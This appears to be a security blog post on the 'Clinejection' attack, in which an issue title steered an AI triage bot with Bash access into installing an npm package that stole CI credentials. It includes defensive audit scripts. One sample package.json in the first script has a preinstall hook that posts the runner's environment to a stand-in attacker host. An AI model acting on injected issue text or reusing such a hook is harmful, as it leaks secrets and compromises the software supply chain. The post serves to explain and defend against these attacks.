'Clinejection': spread a payload by opening an issue

Prompt injection (feeding malicious text to a genAI tool so that the tool performs an action on the attacker's behalf) is an unsolved problem. There is no foolproof way to prevent every prompt injection attack, but there are ways to limit the blast radius of one. The setup described below is not one of them.

AI Agent given too many tools

From the Snyk writeup:

On February 9, 2026, security researcher Adnan Khan publicly disclosed a vulnerability chain (dubbed "Clinejection") in the Cline repository that turned the popular AI coding tool's own issue triage bot into a supply chain attack vector. Eight days later, an unknown actor exploited the same flaw to publish an unauthorized version of the Cline CLI to npm, installing the OpenClaw AI agent on every developer machine that updated during an eight-hour window.

The issue triage bot was run with an --allowedTools list that included Bash, which gave the AI agent arbitrary command execution on the GitHub Actions runner. Since the text of a newly opened issue is attacker-controlled and was fed to the agent as part of its prompt, anyone who could open an issue could steer what that Bash tool ran.

Toxic Flow

By opening an issue with a malicious title, the attacker could get the agent to run npm install on a package whose preinstall script exfiltrated credentials from the runner's environment. npm runs such lifecycle scripts during installation, before any of the package's code is imported, so simply installing the package is enough to execute it.

Snyk calls this "toxic flow":

...untrusted data flowing into an AI agent's context, combined with tool access that allows code execution, creating a "toxic flow" where the attacker controls what the agent does
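The install step of the chain above, as an added example that is not code from the post, from Snyk or from the Cline project: a small audit of the package.json files in an installed dependency tree that lists every install-time lifecycle script npm would run, and flags the ones that reach for the environment or the network. The three packages, their names and the collector host are constructed for the example.

```python
"""Audit npm dependencies for install-time lifecycle scripts.

Added example; not code from the post, from Snyk or from the Cline project.
npm runs a dependency's preinstall/install/postinstall/prepare scripts during
`npm install`, before any of its code is imported, so a package that exists
only to be installed by a CI agent is a complete code-execution primitive.
The three package.json documents below are constructed for the example.
"""
import json

# Hooks npm runs automatically when a package is installed, in this order.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Crude textual signals that an install hook reads the environment or talks
# to the network. A real scanner would parse the command; this is a triage aid.
SUSPICIOUS = ("process.env", "$(env)", "printenv", "curl ", "wget ",
              "fetch(", "require('https')", "https://", "http://")


def audit_package(package_json: str) -> dict:
    """Return the install-time hooks of one package and which look suspicious."""
    pkg = json.loads(package_json)
    scripts = pkg.get("scripts") or {}
    hooks = {h: scripts[h] for h in INSTALL_HOOKS if h in scripts}
    flagged = [h for h, cmd in hooks.items()
               if any(sig in cmd for sig in SUSPICIOUS)]
    return {"name": pkg.get("name", "<unnamed>"), "hooks": hooks,
            "suspicious": flagged}


def audit_tree(package_jsons) -> list:
    """Audit every package.json in a tree; keep only packages that have hooks."""
    return [r for r in map(audit_package, package_jsons) if r["hooks"]]


# Constructed sample tree: a plain library, a native addon with a legitimate
# build hook, and a package whose only purpose is its preinstall hook, which
# posts the runner's environment (where mapped CI secrets live) to an attacker host.
SAMPLE_TREE = [
    json.dumps({"name": "tiny-string-utils", "version": "1.0.0",
                "scripts": {"test": "node test.js"}}),
    json.dumps({"name": "native-addon", "version": "2.3.1",
                "scripts": {"install": "node-gyp rebuild"}}),
    json.dumps({"name": "@example/issue-helper", "version": "0.0.1",
                "scripts": {"preinstall":
                            "node -e \"require('https').request("
                            "{host:'collector.example',method:'POST'})"
                            ".end(JSON.stringify(process.env))\""}}),
]

if __name__ == "__main__":
    for result in audit_tree(SAMPLE_TREE):
        print(result["name"], result["hooks"],
              "SUSPICIOUS" if result["suspicious"] else "")
```

Running it lists the native addon's build hook (present, not flagged) and the preinstall hook of the fake helper package, which posts process.env, where any secret mapped into the job's environment lives, to an outside host. The mechanical mitigation is npm ci --ignore-scripts, which skips lifecycle scripts entirely; in this chain, though, the agent chose to run the install in the first place, which is why taking the Bash tool away is the fix that matters.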

How to protect against toxic flow

  1. Do not give AI agents in your CI/CD pipelines the Bash, Write, or Edit tools. Grant the minimum set of tools the task requires; a triage bot that labels issues needs none of them.
  2. Limit the use of caching in your pipelines. If an attacker can poison a cache, their payload persists into later runs and into other workflows that restore the same cache, widening the attack surface.
  3. Use separate credentials for separate builds: dev, staging, nightly and production should never share a secret, so that a compromised triage or nightly job cannot publish a release.
  4. Never interpolate user input into AI agent prompts (in GitHub Actions, a ${{ github.event.issue.title }} expression inside a prompt or a run step is exactly that). This is what causes the majority of injection attacks, and it is the equivalent of building SQL queries from unescaped user strings.
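The four rules above, together with the --allowedTools problem from the triage bot, as one added checker that is not code from the post, from Snyk or from the Cline project: it takes a GitHub Actions workflow as the dict yaml.safe_load returns for the .yml file, reports every toxic-flow condition it finds, and is run against a constructed vulnerable workflow and its hardened version. The agent action (example/ai-triage) with its allowed_tools and prompt inputs, and all job, environment and secret names, are assumptions made for the example.

```python
"""Toxic-flow checker for a GitHub Actions workflow.

Added example, not code from the post or from the Cline project. Takes the
dict yaml.safe_load returns for a workflow file and flags the four rules
above. The example/ai-triage action, its allowed_tools/prompt inputs and
every job, environment and secret name are assumptions for the example.
"""
import re

EXEC_TOOLS = {"Bash", "Write", "Edit"}

# Event fields that anyone who can open an issue, PR or comment controls.
# Not exhaustive; github.event.issue.number, by contrast, is not attacker text.
UNTRUSTED = re.compile(
    r"\$\{\{[^}]*github\.(?:"
    r"event\.(?:issue|pull_request|discussion)\.(?:title|body)"
    r"|event\.(?:comment|review)\.body"
    r"|event\.pull_request\.head\.(?:ref|label)"
    r"|head_ref)[^}]*\}\}")
SECRET_REF = re.compile(r"secrets\.([A-Za-z_][A-Za-z0-9_]*)")

def _scalars(node, path=()):
    """Yield (path, value) for every leaf of a nested dict/list."""
    if isinstance(node, dict):
        for k, v in node.items():
            yield from _scalars(v, path + (str(k),))
    elif isinstance(node, list):
        for i, v in enumerate(node):
            yield from _scalars(v, path + (str(i),))
    else:
        yield path, node

def check_workflow(wf: dict) -> list:
    findings = []
    secret_envs = {}  # secret name -> environments (or jobs) that use it
    for job_name, job in wf.get("jobs", {}).items():
        env = job.get("environment", job_name)
        if isinstance(env, dict):  # environment: {name: ..., url: ...}
            env = env.get("name", job_name)
        for i, step in enumerate(job.get("steps", [])):
            inputs = step.get("with") or {}
            # 1. code-execution tools handed to an agent
            tools = inputs.get("allowed_tools", "")
            if isinstance(tools, str):
                tools = [t.strip() for t in tools.split(",")]
            granted = EXEC_TOOLS & set(tools)
            if granted:
                findings.append(f"{job_name}/steps/{i}: agent granted {sorted(granted)}")
            # 2. a cache that a hijacked run can write and later runs restore
            if str(step.get("uses", "")).startswith("actions/cache"):
                findings.append(f"{job_name}/steps/{i}: restores a shared cache")
        for path, value in _scalars(job, (job_name,)):
            if not isinstance(value, str):
                continue
            # 4. attacker-controlled text interpolated into a prompt or run: script
            if UNTRUSTED.search(value):
                findings.append(f"{'/'.join(path)}: untrusted event text interpolated")
            for name in SECRET_REF.findall(value):
                secret_envs.setdefault(name, set()).add(env)
    # 3. one credential reused across deployment targets
    for name, envs in sorted(secret_envs.items()):
        if len(envs) > 1:
            findings.append(f"secret {name} shared by {sorted(envs)}")
    return findings

def _publish_job(env_name, secret, tag=""):
    """Constructed npm publish job that authenticates with one named secret."""
    return {"runs-on": "ubuntu-latest", "environment": env_name,
            "steps": [{"run": f"npm publish {tag}".strip(),
                       "env": {"NODE_AUTH_TOKEN": "${{ secrets." + secret + " }}"}}]}

# Constructed workflows: the shape of the setup the post describes, then a
# version that follows all four rules.
VULNERABLE = {"jobs": {
    "triage": {"runs-on": "ubuntu-latest", "steps": [
        {"uses": "actions/cache@v4", "with": {"path": "~/.npm", "key": "npm-cache"}},
        {"uses": "example/ai-triage@v1", "with": {
            "allowed_tools": "Bash,Read,Write",
            "prompt": "Triage this issue: ${{ github.event.issue.title }}",
            "api_key": "${{ secrets.LLM_API_KEY }}"}}]},
    "publish-nightly": _publish_job("nightly", "NPM_TOKEN", "--tag nightly"),
    "publish-release": _publish_job("production", "NPM_TOKEN"),
}}

HARDENED = {"jobs": {
    "triage": {"runs-on": "ubuntu-latest", "permissions": {"issues": "read"},
               "steps": [{"uses": "example/ai-triage@v1", "with": {
                   "allowed_tools": "Read",  # the action fetches the issue as data
                   "prompt": "Label issue #${{ github.event.issue.number }}",
                   "api_key": "${{ secrets.LLM_API_KEY }}"}}]},
    "publish-nightly": _publish_job("nightly", "NPM_TOKEN_NIGHTLY", "--tag nightly"),
    "publish-release": _publish_job("production", "NPM_TOKEN_RELEASE"),
}}

if __name__ == "__main__":
    for label, wf in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        print(label, check_workflow(wf) or "no findings")
```

The hardened workflow still lets the agent read the issue it is labelling, so untrusted text still reaches the model; what the checker confirms is that nothing the model says can turn into a shell command, a file write, a poisoned cache or a release-publishing credential, which is the scope limiting the opening paragraph talks about.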